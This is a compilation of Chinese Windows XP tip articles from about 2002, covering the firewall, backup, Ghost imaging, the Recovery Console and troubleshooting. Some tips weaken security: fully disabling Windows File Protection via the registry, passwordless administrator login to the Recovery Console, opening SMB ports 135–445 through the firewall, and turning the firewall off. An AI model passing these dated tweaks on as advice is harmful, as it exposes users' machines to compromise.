    在网络时代中，病毒的传播方式、传播速度和破坏力发生了翻天覆地变化，而且黑客行为也正在全世界范围内活动。为了防止病毒和黑客的随意入侵，不少用户在自己的计算机中都安装了防火墙。而Windows XP就加入了免费的"Internet 连接防火墙"功能，利用该功能，Windows XP能对出入系统的所有信息进行动态数据包筛选，允许系统同意访问的人与数据进入自己的内部网络，同时将不允许的用户与数据拒之门外，最大限度地阻止网络中的黑客来访问自己的网络，防止他们随意更改、移动甚至删除网络上的重要信息。在使用“连接防火墙”功能时，您可以依次单击开始菜单中的"设置"/"网络连接"菜单项，然后从弹出的窗口中选择需要上网的拨号连接，然后用鼠标右键单击该连接图标，并选择"属性"命令，在随后弹出的拨号属性窗口中再单击"高级"标签，在对应标签的页面中选中"Internet连接防火墙"选项，然后再单击对应防火墙的“设置”按钮，来根据自己的要求设置一下防火墙，以便防火墙能更高效地工作。

    6、随时起用屏保程序

    看到“屏保”二字，大家肯定会很自然地想到计算机中的屏幕保护程序，它主要是通过采用不同方式轮流显示指定图片来达到屏幕保护的目的。但是只有当不操作电脑达到事先设置的时间后，系统才会启动屏幕保护程序，如果我们想在任意指定的时间内启动屏幕保护程序，该怎么办呢？我们可以按照下面的操作方法来实现：在Windows XP的开始菜单中，依次单击"开始"/"搜索"/"文件或文件夹"，然后在弹出的搜索对话框中，点击"所有文件和文件夹"类型，并在对应文件名的文本框中输入"*.scr"字符，再在搜索范围下拉列表中，选择"本机磁盘(C:)"或计算机上存储系统文件的驱动器，最后单击"搜索"按钮。然后在找到的屏幕保护程序列表中，选择需要的屏保程序，然后给这个屏保程序建立一个存放在桌面上的快捷方式，以后要启动屏保程序时直接用鼠标双击桌面上的屏保快捷方式。

    7、为自己分配管理权限

    安装在Windows XP操作系统中的许多程序，都要求用户具有一定的管理权限才能让用户使用程序，因此为了能够使用好程序，我们有时需要为自己临时分配一个访问程序的管理权限。在分配管理权限时，我们可以先普通用户身份登录到Windows XP的系统中，然后用鼠标右键单击程序安装文件，同时按住键盘上的Shift键，从随后出现的快捷菜单中点击"运行方式"，最后在弹出的窗口中输入具有相应管理权限的用户名和密码就可以了。

    8、消除系统假死现象

    在操作Windows XP中的应用程序时，由于操作不当或者系统本身的问题，导致了操作的程序很长时间没有响应，许多人以为计算机肯定是死机了，于是不少人选择了直接关机或者使用Ctrl+Alt+Delete来重新启动计算机。其实在Windows XP中，有些不能正常运行的程序会引起系统任务栏的假死，这种现象主要是由于当前执行的程序与系统无法兼容引起的。遇到这种现象时，我们可以找到该程序的执行文件，然后单击鼠标右键，在弹出的对话框中选择"兼容性"标签，再在"兼容模式"下选择相应需要的运行环境。


Windows XP的备份与还原之备份篇

《一键清理系统垃圾》

Windows XP的备份与还原之备份篇

1、备份系统文件
    我们这里说的备份系统文件是通过创建紧急恢复盘来完成的，在计算机系统工作正常时，我们可以制作系统紧急恢复盘，以便在系统出现问题时，使用它来恢复系统文件，采用这种方法我们可以修复基本系统，包括系统文件、引导扇区和启动环境等。
    步骤如下：打开“开始”菜单，选择“程序”-->“附件”-->“系统工具”-->“备份”命令，打开“备份工具向导”窗口，可直接单击“高级模式”，打开“备份工具”窗口，在“欢迎”选项卡中，单击“自动系统恢复向导”按钮，将打开“自动系统故障恢复准备向导”对话框，单击“下一步”按钮，进入“备份目的地”对话框，在软驱中插入一张空白的软盘，然后单击“下一步”按钮，继续下去即可完成备份工作。
2、备份硬件配置文件
    硬件配置文件可在硬件改变时，指导Windows XP加载正确的驱动程序，如果我们进行了一些硬件的安装或修改，就很有可能导致系统无法正常启动或运行，这时我们就可以使用硬件配置文件来恢复以前的硬件配置。建议用户在每次安装或修改硬件时都对硬件配置文件进行备份，这样可以非常方便地解决许多因硬件配置而引起的系统问题。
    步骤如下：鼠标右键单击“我的电脑”，在弹出的快捷菜单中选择“属性”命令，打开“系统属性”对话框，单击“硬件”标签，在出现的窗口中单击“硬件配置文件”按钮，打开“硬件配置文件”对话框，在“可用的硬件配置文件”列表中显示了本地计算机中可用的硬件配置文件清单，在“硬件配置文件选择”区域中，用户可以选择在启动Windows XP时（如有多个硬件配置文件）调用哪一个硬件配置文件。要备份硬件配置文件，单击“复制”按钮，在打开的“复制配置文件”对话框中的“到”文本框中输入新的文件名，然后单击“确定”按钮即可。

3、备份注册表文件
    注册表是Windows XP系统的核心文件，它包含了计算机中所有的硬件、软件和系统配置信息等重要内容，因此，我们很有必要做好注册表的备份，以防不测。
    步骤如下：首先在“运行”命令框中输入“Regedit.exe”打开注册表编辑器，如果要备份整个注册表，请选择好根目录（我的电脑节点），然后在菜单中选择“导出”命令，打开“导出注册表文件”对话框，在“文件名”文本框中输入新的名称，选择好具体路径，点击“保存”按钮即可。

    注意在默认情况下，注册表编辑器会将我们选择的注册表子树或整个树作为保存对象，如果要备份整个注册表，在“导出范围”中选择“全部”单选按钮；如果只备份注册表中的某一分支，选择“所选分支”单选按钮，然后输入要导出的分支名称即可。
4、制作系统的启动盘
    对于不能从光盘引导启动的计算机，为了防止系统出现故障而无法引导，我们还应该制作用来引导计算机的启动盘，当系统不能启动时，用启动盘引导启动计算机后，可以使用“恢复控制台”、“紧急修复磁盘”和“自动系统恢复”等功能来恢复系统。准备4张空白的、格式化好的3.5英寸软盘，分别标注为“启动盘1”、“启动盘2”、“启动盘3”和“启动盘4”来方便区分，在Windows XP安装时，根据安装向导可以很方便地制作启动盘。
5、备份整个系统
    在我们计算机系统中，往往存放着一些非常重要的常规数据，它们有的甚至比系统数据都重要，比如公司的财务数据和业务数据等。因此我们在备份系统数据的同时，还应该注意备份一些常规重要数据。
    要备份整个系统数据请按如下步骤进行：打开“开始”菜单，选择“程序”、“附件”、“系统工具”、“备份”命令，打开“备份工具”窗口中的“欢迎”选项卡，单击“备份”按钮，打开“备份向导”对话框，单击“下一步”按钮，系统将打开“要备份的内容”对话框，在“选择要备份的资料”选项区域中选择“备份这台计算机的所有项目”单选按钮，然后单击“下一步”按钮继续向导即可。

    注意：在“要备份的内容”对话框中，如果只需要备份系统的状态数据，可以选择“只备份系统状态数据”单选按钮；如果只需要备份指定的数据，可选择“备份选定的文件、驱动器或网络数据”单选按钮。

6、创建系统还原点
    “系统还原”是Windows XP的组件之一，用以在出现问题时将计算机还原到过去的状态，但同时并不丢失个人数据文件（如Microsoft Word文档、浏览历史纪录、图画、收藏夹或电子邮件）。“系统还原”可以监视对系统和一些应用程序文件的更改，并自动创建容易识别的还原点。这些还原点允许用户将系统还原到过去某一时间的状态。
    方法如下：打开“开始”菜单，选择“程序”、“附件”、“系统工具”、“系统还原”命令，打开系统还原向导，选择“创建一个还原点”，点击“下一步”按钮，为还原点命名后，单击“创建”按钮即可创建还原点。

7、设定系统异常停止时Windows XP的对应策略
    我们还可以在系统正常时，设定当系统出现异常停止时，Windows XP的反应措施，比如我们可以指定计算机自动地重新启动，步骤如下：鼠标右键单击“我的电脑”，在弹出的快捷菜单中选择“属性”，打开“系统属性”设置窗口，选择“高级”标签，打开“高级”选项卡，在“启动和故障恢复”选项区域中单击“设置”按钮，打开“启动和故障恢复”对话框，在“系统失败”选项区域中，通过启用复选框可以选择系统失败后的应对策略，在“写入调试信息”选项区域中可以设置写入系统调试信息时的处理方法，设置完毕，单击“确定”按钮返回“系统属性”对话框，再单击“确定”按钮。

8、使用Ghost备份

系统备份

使用Ghost进行系统备份，有整个硬盘（Disk）和分区硬盘（Partition）两种方式。在菜单中点击Local（本地）项，在右面弹出的菜单中有3个子项，其中Disk表示备份整个硬盘（即克隆）、Partition表示备份硬盘的单个分区、Check表示检查硬盘或备份的文件，查看是否可能因分区、硬盘被破坏等造成备份或还原失败。分区备份作为个人用户来保存系统数据，特别是在恢复和复制系统分区时具有实用价值。

   选Local→Partition→To Image菜单，弹出硬盘选择窗口，开始分区备份操作。点击该窗口中白色的硬盘信息条，选择硬盘，进入窗口，选择要操作的分区（若没有鼠标，可用键盘进行操作：TAB键进行切换，回车键进行确认，方向键进行选择）。

在弹出的窗口中选择备份储存的目录路径并输入备份文件名称，注意备份文件的名称带有GHO的后缀名。

接下来，程序会询问是否压缩备份数据，并给出3个选择：No表示不压缩，Fast表示压缩比例小而执行备份速度较快，High就是压缩比例高但执行备份速度相当慢。最后选择Yes按钮即开始进行分区硬盘的备份。Ghost备份的速度相当快，不用久等就可以完成，备份的文件以GHO后缀名储存在设定的目录中。

系统克隆

   硬盘的克隆就是对整个硬盘的备份和还原。选择菜单Local→Disk→To Disk，在弹出的窗口中选择源硬盘（第一个硬盘），然后选择要复制到的目标硬盘（第二个硬盘）。注意，可以设置目标硬盘各个分区的大小，Ghost可以自动对目标硬盘按设定的分区数值进行分区和格式化。选择Yes开始执行。

   Ghost能将目标硬盘复制得与源硬盘几乎完全一样，并实现分区、格式化、复制系统和文件一步完成。只是要注意目标硬盘不能太小，必须能将源硬盘的数据内容装下。

   Ghost还提供了一项硬盘备份功能，就是将整个硬盘的数据备份成一个文件保存在硬盘上（菜单Local→Disk→To Image），然后就可以随时还原到其他硬盘或源硬盘上，这对安装多个系统很方便。使用方法与分区备份相似。


Windows XP的几个使用技巧

《一键清理系统垃圾》

Windows XP的几个使用技巧

2002-02-19　　　　　　作者：bFan

    一、快速缩放网页字体

    笔者无意中将书压在了Ctrl键上，再用鼠标滚轮滚动网页时，发现网页并没有上下滚动，取而代之的是网页字体的缩放。按住Ctrl键后，向上滚动滚轮字体缩小，向下滚动放大。这个技巧只对网页上的文字有效，对图片无效。

    二、屏幕键盘

    用鼠标点开始-〉运行-〉敲入osk,就会弹出屏幕键盘，您就可以用鼠标完全操作键盘。您还可以建立一个快捷方式快速启动屏幕键盘。在桌面上点鼠标右键-〉新建-〉快捷方式-〉敲入osk-〉回车就完成了。如果您一只手拿着手机在通话，另一只手用鼠标操作键盘，十分方便。

    三、关闭报告错误

    点开始-〉运行-〉敲入msconfig-〉服务-〉把Error Reporting Service单选框的勾点掉，再点确定就OK了。以后再也没有程序因错误或兼容性不好被强行关闭后弹出的讨厌的报告错误对话框了。

四、快速打开控制面板

    把鼠标移动到“开始”上-〉点鼠标右键-〉属性-〉自定义（开始菜单）-〉高级-〉开始菜单项目-〉显示为菜单-〉确定就行了，您以后就可以像打开程序一样在“开始”菜单中打开一个控制面板的项目，很节约时间。

    五、windows XP常用快捷键

    win：打开“开始”菜单
    win+D：最小化或恢复windows窗口
    win+E：打开“资源管理器”
    win+F：打开“搜索”对话框
    win+Ctrl+F：打开“搜索计算机”对话框
    win+F1：打开“帮助和支持中心”
    win+R：打开“运行”对话框
    win+break：打开“系统属性”窗口
    win+L：锁定计算机
    win+U：打开“辅助工具管理器”

六、快速拷贝文件

    笔者又这样的习惯，过一段时间就把硬盘上的文件分类整理一下，把图片放在picture文件夹中，mp3文件放在music文件夹中等等，但来回复制、粘贴真的很烦琐，现在让我们用一个简单的方法快速拷贝文件。选中一个文件夹如music-〉点鼠标右键创建一个快捷方式-〉复制这个快捷方式-〉在SendTo文件夹中粘贴此快捷方式。

    SendTo是windowsXP的系统文件夹，“发送到”功能就是由它来实现的。现在我们选中任意一个mp3，点鼠标右键在发送到中选择“快捷方式到music”，这个mp3文件就被复制到了music文件夹中，是不是very easy！您还可以根据自己的需要制作software、txt、webpage等等，就看您的了！

    七、给分页文件搬家

    windows XP运用的虚拟缓存技术可以将磁盘作为虚拟内存来使用，但同时会占用大量的硬盘空间，这对于拥有小硬盘和将系统区分得很小的用户来说是很痛苦的，不但运行速度慢，而且windows会不时的让你整理磁盘，在windows9x和me下您是无法把分页文件pagefile.sys移动的，在XP下您可以把这个文件移动到任何一个分区。操作过程如下：我的电脑-〉（点鼠标右键）属性-〉高级-〉设置（性能）-〉高级-〉更改（虚拟内存）。在对话框中您就可以制定把分页文件放在哪个分区以及文件的大小，给您充分的自由。


你应该知道的Windows XP的小秘密

《一键清理系统垃圾》

你应该知道的Windows XP的小秘密

2002-02-03　　　　　作者：

自从微软发布Windows XP以来，Windows XP已经得到人们越来越广泛的应用，微软也宣称它是迄今为止最好的操作系统。Windows XP到底有什么出色的地方？让我先来告诉你其中的一些小秘密吧！

    ● 关闭自动播放功能

    一旦您将媒体插入驱动器，自动运行就会从驱动器中读取数据，这会造成程序的设置文件和在音频媒体上的音乐立即开始。你可以用下面这个办法关闭这个功能：点“开始”→“运行”，在对话框中输入“gpedit.msc” →“计算机配置”→“管理模板”→“系统”，双击“关闭自动播放”，在“设置”中选“已启用”，确定即可。

    ● 使ZIP文档读取能力失效

    Windows XP默认支持.ZIP文档，但系统会为此耗费大量资源，你可以将这一功能关闭，只需在“开始”选单的“运行”中输入“regsvr32/u zipfldr.dll”即可。

    ● 卸载无用的动态链接

    资源管理器经常在内存中留下无用的动态链接，为了消除这种现象，你可以打开注册表编辑器，设置键值：HKEY_LOCAL_MACHINE＼ SOFTWARE ＼Microsoft＼Windows＼CurrentVersion＼Explorer。

    AlwaysUnloadDLL=DWORD: 1将其设为0，这一功能就会被关闭。注意：为了让设置生效，需要重新启动计算机。

    ● 消除Windows文档保护功能

    为了完全消除Windows文档保护功能，打开注册表编辑器，设置键值：HKEY_LOCAL_MACHINE＼ SOFTWARE＼Microsoft＼Windows NT＼CurrentVersion＼Winlogon SFC Disable=0xFFFFFF9D

    ● 查看驱动器组件信息

    右键点击“我的电脑”，点选弹出选单中的“管理”，依次打开“可移动存储”→“库”，用右键点击所要查询的驱动器，点选弹出选单中的“属性”，点选“设备信息”就可看到驱动器的信息了。

    ● 在关机时清空页面文件

    打开“控制面板”，点击“管理工具”→“本地安全策略”→“本地策略”→“安全选项”，双击其中“关机：清理虚拟内存页面文件”一项，点击弹出选单中的“已启用”选项，单击“确定”即可。


Windows XP防火墙后的安全共享

《一键清理系统垃圾》

Windows XP防火墙后的安全共享

    通过开启Windows XP系统中内置的“Internet 连接防火墙”可以让我们安心的上网冲浪，但是在开启了“Internet 连接防火墙”之后，我们就会发现不能正常的使用“网络共享”功能了。“Internet 连接防火墙”在阻挡恶意程序的时候也把我们常用的“网络共享”功能给禁止了。

    那有没有方法可以使我们既开启“Internet 连接防火墙”又使用“网络共享”功能呢？答案当然是肯定的，本文下面的内容就来介绍如何实现“Internet 连接防火墙”和“网络共享”如何共存。

    首先，为了计算机的安全在设置共享目录的时候，我们最好要为每个共享目录都设置允许访问的用户名和密码。

    接着，我们通过以下步骤使得“Internet 连接防火墙”和“网络共享”可以和平共处。

    在控制面板的“网络连接”中点击右键，在弹出菜单中选择“属性”。在属性对话框中选择“高级”选项卡，然后点击“设置”按钮。弹出如图1所示的“高级设置”页面。

图1 高级设置页面

    在图1所示的高级设置页面中，我们看到列出了几种常用的网络服务，但是这里并没有我们要使用的“网络共享”规则，所以我们需要添加规则。点击图1中的“添加”按钮，弹出如图2所示“服务设置”页面。

图2 服务设置页面

    在图2页面中依次输入如下内容：

    服务描述：文件共享 端口号

    计算机名称和IP地址：127.0.0.1

    此服务的外部端口号：端口号

    此服务的内部端口号：端口号

    这里的端口号依次是：135，136，137，138，139，445，即依次要输入6次。

    上面设置的是TCP服务，但我们还需要使用UDP服务，所以我们还要按照前面的步骤在输入6次，只是把图2页面中所示的选中TCP改成选中UDP。

    经过以上设置，你会发现“Internet 连接防火墙”和“网络共享”已经可以和平共处了。


windows xp故障简单恢复技巧

《一键清理系统垃圾》

windows xp故障简单恢复技巧

Windows XP是目前大家普遍使用的操作系统，其稳定性和易用性不容置疑。但是它也像人一样会闹个头疼脑热，出现点“感冒”症状，严重时得了重感冒一病不起也是不鲜见的事，这时很多人就会想到重装系统，但重装系统有一个最大的麻烦，就是需要之前备份，否则恢复到以前的使用习惯很难，一旦遇到一系统启动不起来，想备份也没了机会，这时你该 怎么办呢?在这里我给你一个比较好的答案:

    一、Windows环境下

    如果你的计算机还可以进入Windows环境中，那么恭喜你，这种情况下即使系统出现了问题，仍然不会是大问题。在这种情况通常会出现以下几种方法:

    1.从安装光盘解压缺少的一些重要文件

    如果WindowsXP已经进入，但却发现少了某些文件，其中最常见的是Rundll32.exe的丢失。下面就以恢复这个文件为例来说明:单击“开始”/“运行”，在该窗口中输入expand x:\i386\Rundll32..ex_ c:\windows\system32\Rundll32.exe(x代表光驱盘符，rundll.ex_代表需要解压的文件，c:\windows\system32指的是目标文件夹，这些都要根据具体情况来定),即可将丢失的文件恢复至系统。当然也可以直接从其他正常运行的机器复制该文件至本机的相应目录下。

    另外，对于丢失的dll链接文件，还可以通过Regsvr32这个程序文件来恢复，恢复的时候需要在运行窗口中输入Regsvr32 a.dll(a.dll代表丢失的链接文件)，回车后即会在注册表中注册该文件，然后在弹出的对话框中点“确定”即可。

    2.DLL文件的恢复

    DLL文件的名称为动态链接库文件，一般存在于Windows\system32文件夹下，该文件丢失或者被替换，一般也可进入Windows，但是执行应用程序时往往会出现系统报错。这种错误通常可以通过Sfc(系统文件检查器)。sfc是一个命令行程序，必须在WindowsXP的“命令提示符”窗口下才能运行，为了实现多种功能，sfc提供了多个参数，使用格式为:sfc/参数1 /参数2……，各个参数之间要用一个空格隔开。下面介绍一下其几个主要的参数，以方便大家使用:

    /scannow:用来扫描所有受保护的系统文件，也是应用比较广的一个参数，它主要是通过正确的系统文件代替错误的系统文件。该参数还可以将最新版本的受保护系统文件放入DLLCache文件夹，而且在操作过程中可能需要WindowsXP的安装光盘，以及其补丁文件，如果你没有该光盘，而是在硬盘上备份了安装文件，可以通过修改注册表来完成该项功能。在运行窗口键入Regedit命令进入注册表编辑器窗口，找到HKey_Local_Machine\software\Microsoft\Windows\CurrentVersion\setup项，在右侧的窗口中修改Installation Sources、ServicePacksourcePath和SoutcePath三个键值为硬盘上的系统安装程序路径，这样在修复时就不用再插入WindowsXP安装光盘了。

    /scanonce:下次启动时执行受保护系统文件的扫描，也需要读取安装光盘和补丁文件。这个命令常常在执行/scannow命令出现错误提示时才使用。

    /scanboot:每次启动系统时都扫描所受保护的系统文件，这可能大大降低启动速度，一般不用，使用情况同/scanonce参数。

    /purgecache:用来清除文件缓存(该文件默认情况下是在%systemroot%\system32\dllcache下)并立即扫描所有受保护的系统文件，常在其后还要加上“/cachesize=x”这个参数，这个参数是用来设置文件缓存大小的，以MB为单位，该参数如果设置较小可以节省硬盘空间，如果设置大一些可以保护系统文件，则可能尽可能地恢复更多的系统文件。

    一般情况下执行sfc/scannow就可以对系统文件进行恢复了，时间一般在10分钟左右。

    3.系统还原显身手

    如果用sfc/scannow还是出错的话，则可能想到用系统还原功能来恢复系统。特别是在增删某些软件后出现了系统故障的时候，这种方法就显得尤为方便。

    依次单击“开始→所有程序→附件→系统工具→系统还原”，运行“系统还原”命令，打开“系统还原向导”，选择“恢复我的计算机到一个较早的时间”，点击“下一步”，选择好日期后再跟着向导还原即可。

    上文所讲系统还原功能是Windows XP中操作的，如果不能进入Windows XP系统，可以通过如下方法解决:

    ⑴安全模式运行系统还原

    如果Windows XP能进入安全模式的话，则可在安全模式下进行系统恢复，步骤同“恢复还原点”。

    ⑵DOS模式进行系统还原

    如果系统无法进入安全模式，则在启动时按F8，选“Safe Mode with Command Prompt”，用管理员身份登录，进入%systemroot%\windows\system32\restore目录，找到rstrui文件，直接运行rstrui文件，按照提示操作即可。

⑶在丢失还原点的情况下进行系统还原

    在Windows XP预设了System Volume Information文件夹，通常是隐藏的，它保存了系统还原的备份信息。打开查看“显示所有文件和文件夹”属性，取消“隐藏受保护的系统文件”前有选择，会在每个盘中看到“System Volume Information”文件夹。利用这个文件夹可以进行数据恢复。鼠标右击“我的电脑”，选择“属性”/“系统还原”，取消“在所有驱动器上关闭系统还原”复选框，单击“应用”按钮。这样做是为了重建一个还原点。再打开“系统还原”命令，就可以找到丢失的还原点了。

    上面的叙述是针对FAT32分区，如果系统分区为NTFS，那么在启动System Volume Information文件夹时会遇到一点麻烦。因为你可能并没有被加入到System Volume Information安全属性中，访问不到该文件。鼠标右击该文件夹，在弹出的菜单中选择“属性”，打开System Volume Information属性对话框，选中“安全”选项卡，单击“添加”按钮，打开“选择用户或组”窗口，点击该窗口右下角的“高级”按钮，然后单击“立即查找”按钮，这时会列出计算机上所有的用户和组，选中自己当前的账户或账户所在组的名称后“确定”。这样选中的账户被添加到System Volume Information安全属性中，就可以访问该文件夹了。

    二、在DOS环境下

    如果电脑已经进入不了WindowsXP，那么也不用太着急重装系统，因为这时还是有些方法的。

    1.安全模式

    在WindowsXP启动时按F8键，选择“安全模式”，如果能启动成功，则退出后再正常启动。

    2.最后一次正确的配置

    其基本操作同安全模式，但需要说明的是选择该项回车前要确保关闭了键盘上的NumLock指示灯。

    3.故障恢复台

    ⑴控制台的安装

    ①控制台硬盘安装

    插入WindowsXP安装光盘，单击“开始”/“运行”，输入\i386\winnt32.exe/cmdcons命令后回车，在出现的对话框中显示了“故障恢复控制台”安装选项，单击“是”后确认，重新启动计算机即会在启动菜单中看到“Microsoft Windows Recovery Console”菜单，选中后即可进入“故障恢复控制台”。

    ②控制台光盘安装

    首先在BIOS中将启动顺序设置为CD-ROM，再在光驱中插入WindowsXP安装光盘启动系统，在屏幕显示“欢迎使用安装程序”时，按R启动故障恢复控制台。接着系统会要求输入管理员密码，输入后即可进入故障恢复台。若安装了多系统，则需要通过光标键来选择故障恢复台项，对于使用了SCSI或RAID的硬盘，则在其启动时要按F6键。若要担心忘记管理员密码，可在WindowsXP正常启动时，运行Gpedit.msc进入策略编辑器，再依次选择“本地计算机策略”/“计算机配置”/Windows设置/“安全设置”/“本地策略”/“安全选项”，在右侧的窗口的双击“故障恢复控制台:允许自动系统管理级登录”项，鼠标右击，选择“启动”，单击“确定”按钮后保存设置，进入故障恢复控制台就不用输入密码了。

    ⑵“故障恢复控制台”应用

    ①修复受损的多启动菜单

    如果多操作系统菜单因为某种原因丢失，则可以进入“故障恢复控制台”，输入Bootcfg/scan命令，会自动扫描所安装的操作系统并显示出来，完成后再输入Bootcfg/rebuild命令，出现提示后按Y键，在“输入加载识别符”提示后输入丢失的启动菜单项，在“输入OS加载选项”后输入fastdetect后回车，即可找到多系统菜单。另外输入Bootcfg/add命令也可以向启动菜单中添加菜单项，使用方法基本同上。

    ②修复系统引导区

    当系统引导区因为某种原因造成损坏而不能启动时，可以进入故障恢复控制台，在命令行下输入Fixboot可以修复引导区。

    ③恢复系统重要文件

    系统中有一些重要的文件直接关系着是否能启动成功，如Ntldr这个文件丢失，系统就启动不起来，这时可以进入控制台，键入命令行copy x:\i386\ntldr*.* c:\后回车即可，重新启动后会发现能够正常进入WindowsXP了。如果丢失的是一些压缩文件，还可以在控制台输入expand x:\i386\a.ex_ c:\windows\(x代表光驱盘符，a.ex_代表需要解压的文件，c:\windows指的是目标文件夹，这些都要根据具体情况来定),即可将丢失的文件恢复至系统。

    ④启用或禁用某些服务或驱动程序

    这一功能主要应用于由于安装某些新的程序造成系统无法启动的情况，我们可能通过在故障恢复控制台中去掉该项服务或程序以达到系统起死回生的目的。具体操作如下:

    进入控制台，输入Listsvc命令后回车，在屏幕上会出现当前系统中已有的所有服务和驱动程序以及其状态说明。找到需要禁用的可疑服务或驱动程序，输入命令 disable 需要禁用的程序或服务，回车后屏幕上会显示出该服务以前的状态和完成后的状态;如果想雇用某个程序或服务，则需要键入Enable 需要禁用的程序或服务，回车后即可。


Windows XP挂起到硬盘后的异常故障解决

《一键清理系统垃圾》

Windows XP挂起到硬盘后的异常故障解决

2002-02-25　　　　作者 ·苏悦

Windows XP除了界面上的美观和安全性能大大提高外，在很多小地方考虑得很周到，体贴方便了用户。比如它的储存当前状态到硬盘，然后开机不必再经过硬件的初始化，直接从储存的状态读取数据，一般能在15秒左右开机，启动的速度大大提高。但是，由于硬件和软件的兼容性，使用XP的这种功能的时候，可能会遇到一些异常的情况，下面就分析一下并给出参考的解决办法：

一、板载声卡发音不正常

现在很多主板都附带了AC97的声卡，如果您的机器里的板载声卡是软声卡，那么有可能会在挂起到硬盘后，第二次快速开机的时候，发现声音不正常。笔者见过一块精英的SIS735主板上附带的软声卡就是如此——不仅在windowsXP快速开机后发音不正常，在windows98退出到纯DOS状态后，再用EXIT指令回到windows图形界面的时候，声卡根本不发音。

参考的解决办法：由于这是硬件方面的问题，故此人工调整的机会不大。可以尝试更换最新的驱动程序，如果不行，就只好买一块外接的声卡或是老老实实地重新启动电脑了。值得注意的是，在XP中，此时声卡还是有很小沙哑的声音的，听起来就像音箱的问题不是声卡的问题，实际却是这种声卡必须经过硬件的重新初始化才能重新使用造成的。这才是我写出这点异常情况真正原因，免得大家在音箱上浪费时间，甚至乱“调整”损坏了音箱。

二、显示不正常（花屏或黑屏）

有的机器，在快速开机或是从SLEEP状态唤醒后，可能会出现花屏和黑屏现象。这可能有三种原因：

1、显示卡驱动的不完善：这算是最轻的故障，你找一个稳定的驱动程序版本安装就是；

2、电源功率对显示卡的影响：有的劣质电源功率不够，会造成AGP显示卡的供电不足，而XP的重新快速开机是不再初始化硬件的，依赖主板的ACPI功能，所以可能会在电源方面有些影响。

参考的解决办法：一是在BIOS里和windows的电源选项里进行调整，尽量不使用花哨的功能；二是可以建立一个文本文件的快捷方式，放在桌面上，加上自己定义的快捷键，在黑屏或花屏的时候，按快捷键启动这个文本，可能会在屏幕的部分区域显示出文本的内容，多用鼠标点击切换几次画面，显示卡因为刷新了显存中的内容，可能会恢复正常的显示，这是个有点旁门左道、治标不治本的法子，但很实用，呵呵。

三、快速开机后鼠标无法移动

这种故障并不是死机，键盘还是有响应的。其实在以前的windows9X里的唤醒后，也有出现。可能会有两种情况：

1、你的鼠标和主板或是电源不兼容。

2、你的鼠标是冒牌货，所以windowsXP在使用相应内置的驱动程序的时候，识别上有问题，造成一些BUG。

参考的解决办法：先试试把鼠标拔掉，再插上，利用windows的即插即用再次检测鼠标，但这样长久可能会损坏主板接口；更换其他品牌的鼠标，最好是正品鼠标；或是把鼠标的连接从PS/2接口与串口切换一下试试，有些PS/2接口的鼠标是不太适应XP的新功能的。顺便提醒一句，别小看鼠标的冒牌问题，以为能用就成——在安装windowsXP和windows2000的时候，经常就因为假鼠标造成安装的失败。

四、激活问题

windows XP加入了激活的设置防止盗版。有的人安装的是30天要激活的版本，如果你的主板电池掉电了，开机的日期不正常，在快速开机的“欢迎使用”之后，windows XP可能会提示你必须激活才能使用。因为有的人贪图方便，可能会在没保存或转移某些重要文档的情况下就用了挂起到硬盘的功能，遇到激活提示的时候，因为激活功能锁定了系统，不能再进入图形界面处理未完成的文档而损失工作的成果。这虽不算快速开机的真正故障，也不算很普遍，还是要提醒大家的，如果你不想激活产品，那么注意你的日期哦——因为快速开机毕竟也是一种重新启动，windowsXP是会检测的。


Ｗindows XP精彩答辩

《一键清理系统垃圾》

Ｗindows XP精彩答辩

2002-01-15　　　作者：

    为何我在DOS下安装Windows XP 很慢

    哈哈，你一定没有在安装前运行smartdrv.exe,如果不运行这个，可能一个晚上你也安装不完。Smartdrv.exe这么文件在windows 98/me的光盘或是windows/command/里有。

    为何安装过程中系统提示我必须转化分区为NTFS

    哈哈，这个是因为你在windows 下安装的时候安装的不仔细，刚开始安装的时候有个高级-再安装过程中允许我选择安装到的分区。重新运行安装程序，记得选择这个，然后重新启动后就可以选择安装到的分区和是否保留原分区格式，或是格式化为NTFS OR FAT32等等。

    为何我的modem不能在XP下工作

    这个主要是因为驱动程序的问题，很多猫的Windows 2000下的驱动程序也不能在XP下用了，不过倒是有些猫的98的驱动程序可以在XP下用。另外，金网霸ESS芯片的内猫以及一些rockwell芯片的内猫都可以在XP下很好的工作，用XP自带的驱动即可，而且对于金网霸内猫的用户XP下的驱动没有了像Windows 2000下那样电话打进来就死机的问题了。

    为何我安装了 Windows XP 关机总是变成重起

    哈哈，能遇到这个问题算你幸运了，这个问题是有些主板的高级电源管理不能被WindowsXP支持。一般用AWARD的BIOS的主板的电脑没有这个问题，到目前为止，遇到AMI的BIOS的主板有这个问题，如技嘉的主板。解决的办法是升级你的主板的BIOS，即刷新BIOS.,哈哈，可不要刷错了型号。

    为何我的QQ在 Windows XP下运行很慢

    这个问题好像是目前版本的QQ和Windows XP不大兼容，尤其是老的版本，QQ710还可以，难道是微软为了推广MSNMessenger故意这么做的？哈哈哈……看来我们要等QQXP了。

    为何我的Windows XP 下的Internet Explorer 运行很慢

    这个问题嘛，如果你的机器CPU和内存够用的话，一般没这个问题。不过嘛，我发现，如果你对IE的高级选项里的东西做了改动，如一些效果等等，本来关掉这些效果为了加速IE,其实，这时就会出现IE运行很慢，尤其是显示上面的菜单和工具栏的时候。解决办法就是高级选项的面板上，点击默认，使用IE默认的设置即可。

    为何我的 Windows XP 安装了简体中文语言包后还是英文的

    在一些BBS上，我发现很多朋友不大会安装这个语言包，其实安装好了后，欢迎屏幕已经由WELCOME变成了欢迎了，至于界面，到控制面板，地区区域选项，菜单显示，选择简体中文即可，注销后重新登录即可。如果你不选择所有用户都使用这个配置的话，你会发现，其它用户里面还是英文界面的，哈哈，这次可以中英文版同时用了。

    为何MPEG4格式AVI在Windows Media Player 8.0 不能放

    有时候用Media player放avi的时候只有声音没有图像，或是不能放，这是由于缺少解码器的原因，到www.divx.com 下载安装divx即可。

    为何安装了Windows XP后，我的其它操作系统里的Norton antivirus 2001不能用了

    这个是由于Norton2002以前版本的Norton杀毒软件和Windows XP不兼容，而且要命的是这个不兼容是由于新版的操作系统的ntldr,ntdetect.com, 冲突造成的，如果你不用旧版的文件代替，即使删掉Windows XP也没用的。解决办法是到symantic的网站下载补丁，或是使用norton2002,目前norton antivirus 2002可以很好的在XP下运行。

    为何PS手柄驱动不能在XP下用

    更换手柄驱动程序可以解决。去这里下载：www.topcmm.com下载后，如果运行setup安装不成功，用添加删除新硬件安装驱动。

    关于局域网里Windows XP 的网络问题

    Windows XP的安全性提高，默认不启用NBT.有时候，在局域网里使用自带的防火墙会出现的访问问题，关掉防火墙即可。

